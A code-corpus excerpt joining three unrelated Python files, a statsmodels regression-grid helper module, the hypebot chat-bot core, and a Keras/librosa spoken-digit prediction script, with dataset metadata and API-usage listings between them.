desc="building regression model grid"): grid_key = putils.GridKey(*model_vars) grid[grid_key] = putils.GridValues(X_hyps=X_hyps_dicts[grid_key.X_hyps], ctrl_coefs=ctrl_coefs_dicts[grid_key.ctrl_coefs], outcomes=outcomes_dicts[grid_key.outcomes]) return grid def regression_grid_single(grid_item, data, kind, **kwargs): grid_key, grid_value = grid_item y_var = grid_value.outcomes X_ctrls = ' + '.join(grid_value.ctrl_coefs) X_hyp = ' + '.join(grid_value.X_hyps) try: result = do_regression(data=data, y_var=y_var, X_ctrls=X_ctrls, X_hyp=X_hyp, kind=kind, **kwargs ) return grid_key, result except np.linalg.linalg.LinAlgError: print('error with: {x}'.format(x=X_hyp)) return grid_key, 'LinAlgError' def run_regressions_grid(grid, data, kind, max_workers=None, **kwargs): regressions = tree() partial_regression_grid_single = functools.partial(regression_grid_single, data=data, kind=kind, **kwargs ) with futures.ProcessPoolExecutor(max_workers=max_workers) as worker_pool: # results = tqdm(worker_pool.map(partial_regression_grid_single, (grid_item for grid_item in grid.items()))) results = worker_pool.map(partial_regression_grid_single, (grid_item for grid_item in grid.items())) for job in tqdm(results, total=len(grid)): grid_key, reg_result = job X_hyps = grid_key.X_hyps ctrl_coefs = grid_key.ctrl_coefs outcomes = grid_key.outcomes regressions[outcomes][ctrl_coefs][X_hyps] = reg_result return munch.munchify(regressions) def summarize_multi_LOGIT(results): """Return dataframe aggregating over-all stats from a dictionary-like object containing LOGIT result objects.""" s = defaultdict(defaultdict) for name,reg in results.items(): s['converged'][name] = reg.mle_retvals['converged'] s['iterations'][name] = reg.mle_retvals['iterations'] s['warnflag'][name] = reg.mle_retvals['warnflag'] s['pseudo_rsqrd'][name] = reg.prsquared s['aic'][name] = reg.aic return pd.DataFrame(s) def summarize_single_OLS(regression, col_dict, name, is_regularized=False): """Return dataframe aggregating over-all stats from a dictionary-like object containing OLS result objects.""" reg = regression try: col_dict['rsquared'][name] = reg.rsquared except AttributeError: col_dict['rsquared'][name] = 'NA' try: col_dict['rsquared_adj'][name] = reg.rsquared_adj except AttributeError: col_dict['rsquared_adj'][name] = 'NA' col_dict['f_pvalue'][name] = reg.f_pvalue col_dict['condition_number'][name] = reg.condition_number col_dict['regularized'][name] = is_regularized if not is_regularized: outliers = reg.outlier_test(method='fdr_bh')['fdr_bh(p)'] <= 0.05 col_dict['n_outliers'][name] = (outliers).sum() col_dict['outliers'][name] = ','.join(outliers.index[outliers].values) else: col_dict['n_outliers'][name] = "NA" col_dict['outliers'][name] = "NA" col_dict['aic'][name] = reg.aic return col_dict def summarize_multi_OLS(results): """Return dataframe aggregating over-all stats from a dictionary-like object containing OLS result objects.""" col_dict = defaultdict(defaultdict) test_reg = list(results.values())[0] try: is_regularized = test_reg.regularized except AttributeError: is_regularized = False for name, reg in results.items(): # TODO: Adpat summarize_single_OLS to be used here col_dict = summarize_single_OLS(regression=reg, col_dict=col_dict, name=name, is_regularized=is_regularized) df = pd.DataFrame(col_dict) df.index.name = 'outcome' return df def summarize_grid_OLS(regs, reg_grid): summaries_overall = [] grid_keys = list(reg_grid.keys()) for gk in tqdm(grid_keys, desc="initial summary"): # col_dict = defaultdict(defaultdict) r = regs[gk.outcomes][gk.ctrl_coefs][gk.X_hyps] df_part = summarize_multi_OLS({gk.X_hyps: r}) df_part.index.name = 'X_hyps' df_part = df_part.reset_index() df_part['ctrl_coefs'] = gk.ctrl_coefs df_part['outcomes'] = gk.outcomes summaries_overall.append(df_part) summaries_overall_df = pd.concat(summaries_overall) # calculate q-values and add to regression objects outcome_ctrl_grps = summaries_overall_df.groupby(["outcomes","ctrl_coefs"]) qvals = [] def assign_qvalue_reg(row, regs): qval = row['qvalue_reg'] r = regs[row.outcomes][row.ctrl_coefs][row.X_hyps] r.qvalue_reg = qval for name,df in tqdm(outcome_ctrl_grps, desc="adding qvalues"): df = df.copy() df.index.name = 'dropme' df['qvalue_reg'] = statsmodels.stats.multitest.multipletests(pvals=df['f_pvalue'], alpha=0.05, method='fdr_bh')[1] df["reg_obj"] = df.apply(lambda row: assign_qvalue_reg(row, regs), axis=1) df = df.set_index(["outcomes", "ctrl_coefs","X_hyps"]) qvals.append(df) summaries_overall_df = pd.concat(qvals) columns = ["aic","condition_number","f_pvalue","qvalue_reg","n_outliers","outliers","regularized","rsquared","rsquared_adj"] return summaries_overall_df[columns] def get_diff(a,b): return abs(a) - abs(b) def get_log2_fold(a,b): return np.log2(abs(a) / abs(b)) def compare_coefs(row, value, results): reg = results[row['regression']] try: X_var = reg.params[row['X_hyp']] value = reg.params[value] except KeyError: return "NA" comparisons = "{value} | {diff} | {log2_fold}".format(value=round(value,4), diff=round(get_diff(value,X_var),4), log2_fold=round(get_log2_fold(value,X_var),4) ) return comparisons def identify_full_ctrl_names(X_vars, orig_ctrl_names): """Return set of variable names actually used in regression, tolerating mangling of categoricals.""" X_vars = set(X_vars) ctrls = [] for X_var in X_vars: for orig_ctrl in orig_ctrl_names: if X_var == orig_ctrl: ctrls.append(X_var) elif X_var.startswith(orig_ctrl) and (X_var.startswith('C(') and X_var.endswith(']')): ctrls.append(X_var) else: pass return set(ctrls) def summarize_X_vars(results, sig_thresh=0.05, X_ctrls=None, X_ignore=None): if sig_thresh is None: sig_thresh = 1 if X_ctrls is None: X_ctrls = [] if X_ignore is None: X_ignore = [] regs_dfs = [] for name,reg in results.items(): regs_dfs.append(pd.DataFrame(data={'pvalue_coef':reg.pvalues, 'coef':reg.params, 'regression': name, 'pvalue_reg': reg.f_pvalue, 'qvalue_reg': reg.qvalue_reg }, columns=['regression','pvalue_reg','qvalue_reg','pvalue_coef','coef'], ) ) pvals = pd.concat(regs_dfs) pvals['X_hyp'] = pvals.index.values pvals = pvals.reset_index(drop=True) X_ctrls = identify_full_ctrl_names(X_vars=pvals['X_hyp'].values, orig_ctrl_names=X_ctrls) X_ignore.extend(X_ctrls) ignore_these = pvals.X_hyp.isin(X_ignore) sig = pvals[~ignore_these].query(''' pvalue_coef <= {thresh} '''.format(thresh=sig_thresh)) return sig def summarize_grid_X_vars_OLS(regs, reg_grid, sig_thresh=0.05): rename_map = {"pvalue_coef": "pvalue_param_coef", "coef": "param_coef", "X_hyp": "param_name"} summaries_X_vars = [] grid_keys = list(reg_grid.keys()) for gk in tqdm(grid_keys, desc="initial summaries"): # col_dict = defaultdict(defaultdict) r = regs[gk.outcomes][gk.ctrl_coefs][gk.X_hyps] # df_part = stats.summarize_multi_OLS({gk.X_hyps:r}) df_part = summarize_X_vars(results={gk.X_hyps:r}, sig_thresh=sig_thresh, X_ctrls=None, X_ignore=["Intercept"]) # df_part.index.name = 'X_hyps' # df_part = df_part.reset_index(inplace=False) df_part['ctrl_coefs'] = gk.ctrl_coefs df_part['qvalue_reg'] = r.qvalue_reg df_part['outcomes'] = gk.outcomes summaries_X_vars.append(df_part) columns = ["pvalue_reg","qvalue_reg","pvalue_param_coef","param_coef"] summaries_X_vars_df = pd.concat(summaries_X_vars).rename(columns=rename_map).set_index(["outcomes", "ctrl_coefs","regression","param_name"], append=False, inplace=False).sort_index()[columns] return summaries_X_vars_df def format_all_regression_models(regs, total): """Return tuple of string formated versions of all regression tables in the `regs` object. Args: regs (reg-tree: dict-like): tree-like dict containing the regression results objects as leaves and descriptors as nodes. total (int): total number of results tables to format. Returns: tuple """ # GridKey(X_hyps='ITGA4', ctrl_coefs='ctrl_coefs_no_ster', outcomes='L_Thalamus_Proper') # args = Munch() # args.X_hyps = [] # args.ctrl_coefs = [] # args.outcomes = [] # args.table = [] # # # with futures.ProcessPoolExecutor(max_workers=max_workers) as worker_pool: # # all_tables = worker_pool.map(partial_regression_grid_single, ) divider = "#"*66 tmpl = "-- {outcome} {ctrl} {X_hyp} --\n\n" \ "outcomes: {outcome}\n" \ "ctrl: {ctrl}\n" \ "X_hyp: {X_hyp}\n\n" \ "{table}\n\n" \ "{divider}\n" \ "{divider}\n\n" prog_bar = tqdm(total=total) all_tables = [] for outcome, ctrl_coefs_dicts in regs.items(): for ctrl, X_hyps_dicts in ctrl_coefs_dicts.items(): for X_hyp, result in X_hyps_dicts.items(): table = result.summary2() all_tables.append(tmpl.format(**locals())) prog_bar.update(n=1) return all_tables
null
src/crunchers/statsmodels_helpers/lazy_stats.py
lazy_stats.py
py
14,903
python
en
code
null
code-starcoder2
83
[ { "api_name": "crunchers.ipython_info", "line_number": 23, "usage_type": "call" }, { "api_name": "collections.defaultdict", "line_number": 33, "usage_type": "call" }, { "api_name": "patsy.dmatrices", "line_number": 37, "usage_type": "call" }, { "api_name": "statsmodels.formula.api.Logit", "line_number": 39, "usage_type": "call" }, { "api_name": "statsmodels.formula.api", "line_number": 39, "usage_type": "name" }, { "api_name": "statsmodels.formula.api.glm", "line_number": 53, "usage_type": "call" }, { "api_name": "statsmodels.formula.api", "line_number": 53, "usage_type": "name" }, { "api_name": "statsmodels.regression", "line_number": 66, "usage_type": "attribute" }, { "api_name": "patsy.dmatrices", "line_number": 69, "usage_type": "call" }, { "api_name": "statsmodels.formula.api.OLS", "line_number": 73, "usage_type": "call" }, { "api_name": "statsmodels.formula.api", "line_number": 73, "usage_type": "name" }, { "api_name": "statsmodels.formula.api.OLS", "line_number": 75, "usage_type": "call" }, { "api_name": "statsmodels.formula.api", "line_number": 75, "usage_type": "name" }, { "api_name": "statsmodels.formula.api.rlm", "line_number": 82, "usage_type": "call" }, { "api_name": "statsmodels.formula.api", "line_number": 82, "usage_type": "name" }, { "api_name": "munch.Munch", "line_number": 115, "usage_type": "call" }, { "api_name": "munch.Munch", "line_number": 128, "usage_type": "call" }, { "api_name": "itertools.product", "line_number": 130, "usage_type": "call" }, { "api_name": "tqdm.tqdm", "line_number": 132, "usage_type": "call" }, { "api_name": "crunchers.parallel.GridKey", "line_number": 133, "usage_type": "call" }, { "api_name": "crunchers.parallel", "line_number": 133, "usage_type": "name" }, { "api_name": "crunchers.parallel.GridValues", "line_number": 134, "usage_type": "call" }, { "api_name": "crunchers.parallel", "line_number": 134, "usage_type": "name" }, { "api_name": "numpy.linalg", "line_number": 158, "usage_type": "attribute" }, { "api_name": "functools.partial", "line_number": 167, "usage_type": "call" }, { "api_name": "concurrent.futures.ProcessPoolExecutor", "line_number": 173, "usage_type": "call" }, { "api_name": "concurrent.futures", "line_number": 173, "usage_type": "name" }, { "api_name": "tqdm.tqdm", "line_number": 177, "usage_type": "call" }, { "api_name": "munch.munchify", "line_number": 185, "usage_type": "call" }, { "api_name": "collections.defaultdict", "line_number": 191, "usage_type": "call" }, { "api_name": "pandas.DataFrame", "line_number": 200, "usage_type": "call" }, { "api_name": "collections.defaultdict", "line_number": 236, "usage_type": "call" }, { "api_name": "pandas.DataFrame", "line_number": 248, "usage_type": "call" }, { "api_name": "tqdm.tqdm", "line_number": 258, "usage_type": "call" }, { "api_name": "pandas.concat", "line_number": 269, "usage_type": "call" }, { "api_name": "tqdm.tqdm", "line_number": 280, "usage_type": "call" }, { "api_name": "statsmodels.stats.multitest.multipletests", "line_number": 283, "usage_type": "call" }, { "api_name": "statsmodels.stats", "line_number": 283, "usage_type": "attribute" }, { "api_name": "pandas.concat", "line_number": 288, "usage_type": "call" }, { "api_name": "numpy.log2", "line_number": 301, "usage_type": "call" }, { "api_name": "pandas.DataFrame", "line_number": 353, "usage_type": "call" }, { "api_name": "pandas.concat", "line_number": 363, "usage_type": "call" }, { "api_name": "tqdm.tqdm", "line_number": 390, "usage_type": "call" }, { "api_name": "pandas.concat", "line_number": 405, "usage_type": "call" }, { "api_name": "tqdm.tqdm", "line_number": 439, "usage_type": "call" } ]
619528332
# Copyright 2018 The Hypebot Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """The core of all things hype.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import itertools from threading import Lock import time from absl import logging from concurrent import futures from typing import Any, Callable, Dict, List, Optional, Text, Union from hypebot import types from hypebot.core import async_lib from hypebot.core import proxy_lib from hypebot.core import schedule_lib from hypebot.core import util_lib from hypebot.core import zombie_lib from hypebot.interfaces import interface_lib from hypebot.plugins import coin_lib from hypebot.plugins import deploy_lib from hypebot.plugins import hypestack_lib from hypebot.plugins import inventory_lib from hypebot.protos.channel_pb2 import Channel from hypebot.stocks import stock_factory from hypebot.storage import storage_factory # TODO(someone): Remove and replace usage with direct dependency on types lib. _MessageType = Union[ Text, List[Text]] MessageType = Optional[_MessageType] def _MakeMessage(response: _MessageType) -> types.Message: msg = types.Message() _AppendToMessage(msg, response) return msg def _GetAlternateTextList(value: Union[Text, List[Text]]) -> List[Text]: if isinstance(value, Text): return value.split('\n') # Flat map to expand newlines to separate list items. return list(itertools.chain.from_iterable([x.split('\n') for x in value])) def _AppendToMessage(msg: types.Message, response: _MessageType): if isinstance(response, (bytes, Text)): for line in response.split('\n'): msg.messages.add(text=line) else: assert isinstance(response, list) for line in response: _AppendToMessage(msg, line) class RequestTracker(object): """Tracks user requests that require confirmation.""" _REQUEST_TIMEOUT_SEC = 60 def __init__(self, reply_fn: Callable) -> None: self._reply_fn = reply_fn self._pending_requests = {} # type: Dict[types.User, Dict] self._pending_requests_lock = Lock() def HasPendingRequest(self, user: types.User) -> bool: with self._pending_requests_lock: return user in self._pending_requests def RequestConfirmation(self, user: types.User, summary: str, request_details: Dict, action_fn: Callable, parse_fn: Optional[Callable] = None) -> None: """Create a user request that must be confirmed before action is taken. This is a very generic flow useful for any command/bot service that would like to double-check with the user before some action is taken (e.g. filing an issue). There can be only a single pending request per user at a time. When there is an outstanding request for user, all other calls to this function will fail until either the user confirms or denies their pending request, or _REQUEST_TIMEOUT_SEC has elapsed. Args: user: The user making the request. summary: Summary of the request, used in confirmation message. request_details: Information passed to action_fn upon confirmation. action_fn: Function called if user confirms this request. parse_fn: Function used to parse a user's response. Returns: None """ now = time.time() with self._pending_requests_lock: previous_request = self._pending_requests.get(user, None) if previous_request: if now - previous_request['timestamp'] < self._REQUEST_TIMEOUT_SEC: self._reply_fn(user, 'Confirm prior request before submitting another.') return del self._pending_requests[user] request_details['timestamp'] = now request_details['action'] = action_fn if not parse_fn: parse_fn = lambda x: x.lower().startswith('y') request_details['parse'] = parse_fn self._pending_requests[user] = request_details self._reply_fn(user, 'Confirm %s?' % summary) def ResolveRequest(self, user: types.User, user_msg: str) -> None: """Resolves a pending request, taking the linked action if confirmed.""" now = time.time() with self._pending_requests_lock: request_details = self._pending_requests.get(user) if not request_details: return if not request_details['parse'](user_msg): self._reply_fn(user, 'Cancelling request.') elif now - request_details['timestamp'] >= self._REQUEST_TIMEOUT_SEC: self._reply_fn(user, 'You took too long to confirm, try again.') else: self._reply_fn(user, request_details.get('action_text', 'Confirmation accepted.')) request_details['action'](user, request_details) del self._pending_requests[user] class OutputUtil(object): """Allows plugins to send output without a reference to Core.""" def __init__(self, output_fn: Callable) -> None: self._output_fn = output_fn def LogAndOutput(self, log_level: int, channel: Channel, message: MessageType) -> None: """Logs message at log_level, then sends it to channel via Output.""" logging.log(log_level, message) self.Output(channel, message) def Output(self, channel: Channel, message: MessageType) -> None: """Outputs a message to channel.""" self._output_fn(channel, message) class Core(object): """The core of hypebot. Any state or service that is needed by more than one command. """ def __init__( self, params: Any, # HypeParams interface: interface_lib.BaseChatInterface) -> None: """Constructs core of hypebot. Args: params: Bot parameters. interface: This will always be the original interface that the bot was created with, and never the CaptureInterface during nested calls. For this reason, you should only call Join/Part and potentially Notice/Topic on this interface. Don't call SendMessage or else it can send messages never intended for human consumption. hypeletter_callback: brcooley get rid of this when migrating hypeletter to its own command. """ self.params = params self.nick = self.params.name.lower() self.interface = interface self.output_util = OutputUtil(self.Reply) self.store = storage_factory.CreateFromParams(self.params.storage) cached_type = self.params.storage.get(self.params.storage.type, {}).get( 'cached_type') if cached_type: self.cached_store = storage_factory.Create( cached_type, self.params.storage.get(self.params.storage.type)) else: logging.info('No cached_type found for storage, using default store.') self.cached_store = self.store self.user_tracker = util_lib.UserTracker() self.timezone = self.params.time_zone self.scheduler = schedule_lib.HypeScheduler(self.timezone) self.executor = futures.ThreadPoolExecutor(max_workers=8) self.runner = async_lib.AsyncRunner(self.executor) self.inventory = inventory_lib.InventoryManager(self.store) self.proxy = proxy_lib.Proxy(self.store) self.zombie_manager = zombie_lib.ZombieManager(self.Reply) self.request_tracker = RequestTracker(self.Reply) self.bank = coin_lib.Bank(self.store, self.nick) self.bets = coin_lib.Bookie(self.store, self.bank, self.inventory) self.stocks = stock_factory.CreateFromParams(self.params.stocks, self.proxy) self.deployment_manager = deploy_lib.DeploymentManager( self.nick, self.bets, self.output_util, self.executor) self.hypestacks = hypestack_lib.HypeStacks(self.store, self.bank, self.Reply) self.betting_games = [] self.last_command = None self.default_channel = Channel(visibility=Channel.PUBLIC, **self.params.default_channel.AsDict()) def Reply(self, channel: types.Target, msg: MessageType, default_channel: Optional[Channel] = None, limit_lines: bool = False, max_public_lines: int = 6, user: Optional[types.User] = None, log: bool = False, log_level: int = logging.INFO) -> None: """Sends a message to the channel. Leaving Reply on the HypeCore allows replacing the interface to process nested commands. However, some change will be needed in order to actually create an OutputUtil for HBDS without a HypeCore. Args: channel: Who/where to send the message. msg: The message to send. default_channel: Who/where to send the message if no channel is specified. limit_lines: Whether to limit lines or not. max_public_lines: Maximum number of lines to send to a public channel. user: If specified, where to send the message if its too long. log: Whether to also log the message. log_level: How important the log is. """ if not msg: return if log: text_msg = msg logging.log(log_level, text_msg, exc_info=log_level == logging.ERROR) channel = channel or default_channel if not channel: logging.info('Attempted to send message with no channel: %s', msg) return # Support legacy Reply to users as a string. if not isinstance(channel, Channel): # Send messages for sub-accounts to the real user. channel = Channel(id=channel.split(':')[0], visibility=Channel.PRIVATE, name=channel) if (limit_lines and channel.visibility == Channel.PUBLIC and isinstance(msg, list) and len(msg) > max_public_lines): if user: self.interface.SendMessage( channel, _MakeMessage('It\'s long so I sent it privately.')) self.interface.SendMessage( Channel(id=user, visibility=Channel.PRIVATE, name=user), _MakeMessage(msg)) else: # If there is no user, just truncate and send to channel. self.interface.SendMessage( channel, _MakeMessage(msg[:max_public_lines] + ['...'])) else: self.interface.SendMessage(channel, _MakeMessage(msg)) def ReloadData(self) -> bool: """Asynchronous reload of all data on core. Searches for any attribute that has a ReloadData function and calls it. Returns: Whether reload triggered or not since it was still running. """ if not self.runner.IsIdle(): logging.info('Runner not idle, can not trigger reload.') return False self.proxy.FlushCache() for obj in self.__dict__.values(): if hasattr(obj, 'ReloadData'): logging.info('Triggering reload for: %s', obj.__class__.__name__) self.runner.RunAsync(obj.ReloadData) return True
null
hypebot/hypecore.py
hypecore.py
py
11,507
python
en
code
null
code-starcoder2
83
[ { "api_name": "typing.Union", "line_number": 46, "usage_type": "name" }, { "api_name": "typing.Text", "line_number": 47, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 48, "usage_type": "name" }, { "api_name": "typing.Text", "line_number": 48, "usage_type": "name" }, { "api_name": "typing.Optional", "line_number": 49, "usage_type": "name" }, { "api_name": "hypebot.types.Message", "line_number": 53, "usage_type": "call" }, { "api_name": "hypebot.types", "line_number": 53, "usage_type": "name" }, { "api_name": "hypebot.types.Message", "line_number": 52, "usage_type": "attribute" }, { "api_name": "hypebot.types", "line_number": 52, "usage_type": "name" }, { "api_name": "typing.Union", "line_number": 58, "usage_type": "name" }, { "api_name": "typing.Text", "line_number": 58, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 58, "usage_type": "name" }, { "api_name": "typing.Text", "line_number": 59, "usage_type": "argument" }, { "api_name": "itertools.chain.from_iterable", "line_number": 62, "usage_type": "call" }, { "api_name": "itertools.chain", "line_number": 62, "usage_type": "attribute" }, { "api_name": "hypebot.types.Message", "line_number": 65, "usage_type": "attribute" }, { "api_name": "hypebot.types", "line_number": 65, "usage_type": "name" }, { "api_name": "typing.Text", "line_number": 66, "usage_type": "name" }, { "api_name": "typing.Callable", "line_number": 80, "usage_type": "name" }, { "api_name": "threading.Lock", "line_number": 83, "usage_type": "call" }, { "api_name": "hypebot.types.User", "line_number": 85, "usage_type": "attribute" }, { "api_name": "hypebot.types", "line_number": 85, "usage_type": "name" }, { "api_name": "hypebot.types.User", "line_number": 90, "usage_type": "attribute" }, { "api_name": "hypebot.types", "line_number": 90, "usage_type": "name" }, { "api_name": "typing.Dict", "line_number": 92, "usage_type": "name" }, { "api_name": "typing.Callable", "line_number": 93, "usage_type": "name" }, { "api_name": "typing.Optional", "line_number": 94, "usage_type": "name" }, { "api_name": "typing.Callable", "line_number": 94, "usage_type": "name" }, { "api_name": "time.time", "line_number": 114, "usage_type": "call" }, { "api_name": "hypebot.types.User", "line_number": 132, "usage_type": "attribute" }, { "api_name": "hypebot.types", "line_number": 132, "usage_type": "name" }, { "api_name": "time.time", "line_number": 134, "usage_type": "call" }, { "api_name": "typing.Callable", "line_number": 154, "usage_type": "name" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 159, "usage_type": "name" }, { "api_name": "absl.logging.log", "line_number": 162, "usage_type": "call" }, { "api_name": "absl.logging", "line_number": 162, "usage_type": "name" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 165, "usage_type": "name" }, { "api_name": "typing.Any", "line_number": 178, "usage_type": "name" }, { "api_name": "hypebot.interfaces.interface_lib.BaseChatInterface", "line_number": 179, "usage_type": "attribute" }, { "api_name": "hypebot.interfaces.interface_lib", "line_number": 179, "usage_type": "name" }, { "api_name": "hypebot.storage.storage_factory.CreateFromParams", "line_number": 197, "usage_type": "call" }, { "api_name": "hypebot.storage.storage_factory", "line_number": 197, "usage_type": "name" }, { "api_name": "hypebot.storage.storage_factory.Create", "line_number": 201, "usage_type": "call" }, { "api_name": "hypebot.storage.storage_factory", "line_number": 201, "usage_type": "name" }, { "api_name": "absl.logging.info", "line_number": 204, "usage_type": "call" }, { "api_name": "absl.logging", "line_number": 204, "usage_type": "name" }, { "api_name": "hypebot.core.util_lib.UserTracker", "line_number": 207, "usage_type": "call" }, { "api_name": "hypebot.core.util_lib", "line_number": 207, "usage_type": "name" }, { "api_name": "hypebot.core.schedule_lib.HypeScheduler", "line_number": 209, "usage_type": "call" }, { "api_name": "hypebot.core.schedule_lib", "line_number": 209, "usage_type": "name" }, { "api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 210, "usage_type": "call" }, { "api_name": "concurrent.futures", "line_number": 210, "usage_type": "name" }, { "api_name": "hypebot.core.async_lib.AsyncRunner", "line_number": 211, "usage_type": "call" }, { "api_name": "hypebot.core.async_lib", "line_number": 211, "usage_type": "name" }, { "api_name": "hypebot.plugins.inventory_lib.InventoryManager", "line_number": 212, "usage_type": "call" }, { "api_name": "hypebot.plugins.inventory_lib", "line_number": 212, "usage_type": "name" }, { "api_name": "hypebot.core.proxy_lib.Proxy", "line_number": 213, "usage_type": "call" }, { "api_name": "hypebot.core.proxy_lib", "line_number": 213, "usage_type": "name" }, { "api_name": "hypebot.core.zombie_lib.ZombieManager", "line_number": 214, "usage_type": "call" }, { "api_name": "hypebot.core.zombie_lib", "line_number": 214, "usage_type": "name" }, { "api_name": "hypebot.plugins.coin_lib.Bank", "line_number": 216, "usage_type": "call" }, { "api_name": "hypebot.plugins.coin_lib", "line_number": 216, "usage_type": "name" }, { "api_name": "hypebot.plugins.coin_lib.Bookie", "line_number": 217, "usage_type": "call" }, { "api_name": "hypebot.plugins.coin_lib", "line_number": 217, "usage_type": "name" }, { "api_name": "hypebot.stocks.stock_factory.CreateFromParams", "line_number": 218, "usage_type": "call" }, { "api_name": "hypebot.stocks.stock_factory", "line_number": 218, "usage_type": "name" }, { "api_name": "hypebot.plugins.deploy_lib.DeploymentManager", "line_number": 219, "usage_type": "call" }, { "api_name": "hypebot.plugins.deploy_lib", "line_number": 219, "usage_type": "name" }, { "api_name": "hypebot.plugins.hypestack_lib.HypeStacks", "line_number": 221, "usage_type": "call" }, { "api_name": "hypebot.plugins.hypestack_lib", "line_number": 221, "usage_type": "name" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 225, "usage_type": "call" }, { "api_name": "hypebot.protos.channel_pb2.Channel.PUBLIC", "line_number": 225, "usage_type": "attribute" }, { "api_name": "hypebot.types.Target", "line_number": 229, "usage_type": "attribute" }, { "api_name": "hypebot.types", "line_number": 229, "usage_type": "name" }, { "api_name": "typing.Optional", "line_number": 231, "usage_type": "name" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 231, "usage_type": "name" }, { "api_name": "typing.Optional", "line_number": 234, "usage_type": "name" }, { "api_name": "hypebot.types.User", "line_number": 234, "usage_type": "attribute" }, { "api_name": "hypebot.types", "line_number": 234, "usage_type": "name" }, { "api_name": "absl.logging.INFO", "line_number": 236, "usage_type": "attribute" }, { "api_name": "absl.logging", "line_number": 236, "usage_type": "name" }, { "api_name": "absl.logging.log", "line_number": 258, "usage_type": "call" }, { "api_name": "absl.logging", "line_number": 258, "usage_type": "name" }, { "api_name": "absl.logging.ERROR", "line_number": 258, "usage_type": "attribute" }, { "api_name": "absl.logging.info", "line_number": 262, "usage_type": "call" }, { "api_name": "absl.logging", "line_number": 262, "usage_type": "name" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 265, "usage_type": "argument" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 267, "usage_type": "call" }, { "api_name": "hypebot.protos.channel_pb2.Channel.PRIVATE", "line_number": 268, "usage_type": "attribute" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 268, "usage_type": "name" }, { "api_name": "hypebot.protos.channel_pb2.Channel.PUBLIC", "line_number": 271, "usage_type": "attribute" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 271, "usage_type": "name" }, { "api_name": "hypebot.protos.channel_pb2.Channel", "line_number": 277, "usage_type": "call" }, { "api_name": "hypebot.protos.channel_pb2.Channel.PRIVATE", "line_number": 277, "usage_type": "attribute" }, { "api_name": "absl.logging.info", "line_number": 295, "usage_type": "call" }, { "api_name": "absl.logging", "line_number": 295, "usage_type": "name" }, { "api_name": "absl.logging.info", "line_number": 301, "usage_type": "call" }, { "api_name": "absl.logging", "line_number": 301, "usage_type": "name" } ]
73506498
import os import numpy as np import librosa as lb from keras.models import load_model import tkinter as tk #%% def predict(): filepath_prediction = 'C:\\Users\\Lakshminagaraj\\Documents\\Pramod\\ML project\\SplitOnSilenceFiles' model_load_path = "C:\\Users\\Lakshminagaraj\\Documents\\Pramod\\ML project\\saved_models" prediction_X = [] prediction_X_num = [] for file in os.listdir(filepath_prediction): aud, sr = lb.core.load(filepath_prediction + "\\" + file) #aud = signal.medfilt(aud, 23) mfccs = np.mean(lb.feature.mfcc(y=aud, sr=sr, n_mfcc=50), axis = 1) prediction_X.append(mfccs) prediction_X_num.append(aud) prediction_X_num = np.array(prediction_X_num) model = load_model(model_load_path + "\\" + os.listdir(model_load_path)[-2]) #Prediction of numbers according to a saved model predictions = model.predict_classes(np.array(prediction_X)) predictions = list(predictions) global final_string_num final_string_num = "" while predictions[-1] == 10 or predictions[-1] == 11: predictions.pop() l = len(predictions) i = 0 while i < l: if predictions[i] == 10: i += 1 final_string_num += ((str(predictions[i]) + "-") * 2) elif predictions[i] == 11: i += 1 final_string_num += ((str(predictions[i]) + "-") * 3) else: final_string_num += ((str(predictions[i]) + "-")) i += 1 #print(final_string_num) #tkWindow() return predictions, prediction_X_num def tkWindow(): root = tk.Tk() root.geometry("200x100") root.title("Model Predictions") root.configure(bg = "black") tk.Label(root, text = final_string_num[:-1]).place(relx = 0.25, rely = 0.5, anchor = tk.CENTER) tk.Button(root, text = "OK", command = root.destroy).place(relx = 0.75, rely = 0.5, anchor = tk.CENTER) root.mainloop()
null
prediction.py
prediction.py
py
2,017
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.listdir", "line_number": 14, "usage_type": "call" }, { "api_name": "librosa.core.load", "line_number": 15, "usage_type": "call" }, { "api_name": "librosa.core", "line_number": 15, "usage_type": "attribute" }, { "api_name": "numpy.mean", "line_number": 17, "usage_type": "call" }, { "api_name": "librosa.feature.mfcc", "line_number": 17, "usage_type": "call" }, { "api_name": "librosa.feature", "line_number": 17, "usage_type": "attribute" }, { "api_name": "numpy.array", "line_number": 20, "usage_type": "call" }, { "api_name": "keras.models.load_model", "line_number": 21, "usage_type": "call" }, { "api_name": "os.listdir", "line_number": 21, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 23, "usage_type": "call" }, { "api_name": "tkinter.Tk", "line_number": 50, "usage_type": "call" }, { "api_name": "tkinter.Label", "line_number": 54, "usage_type": "call" }, { "api_name": "tkinter.CENTER", "line_number": 54, "usage_type": "attribute" }, { "api_name": "tkinter.Button", "line_number": 55, "usage_type": "call" }, { "api_name": "tkinter.CENTER", "line_number": 55, "usage_type": "attribute" } ]
560445574
